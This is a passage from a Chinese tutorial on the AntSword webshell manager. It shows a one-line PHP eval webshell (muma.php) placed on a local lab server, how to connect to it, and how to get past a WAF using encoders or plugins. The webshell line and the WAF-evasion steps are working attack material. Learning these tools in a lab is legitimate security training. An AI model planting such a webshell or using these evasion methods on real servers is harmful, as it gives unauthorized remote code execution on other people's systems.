我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示:
<?php @eval($_POST['1']); ?>
内容是一句话木马,连接密码是1.
1.右键点击添加数据
url填写http://192.168.93.129/muma.php
如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下
2.4中国蚁剑其他使用
三、 中国蚁剑绕过Waf
3.1 编码绕过WAF
设置不同的编码器和解码器可以绕过waf,如下所示:
我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示
<?php @eval($_POST['1']); ?>
- 右键点击添加数据
url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功
3.2插件绕过waf
如上所示,点击插件市场,进行插件下载
由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试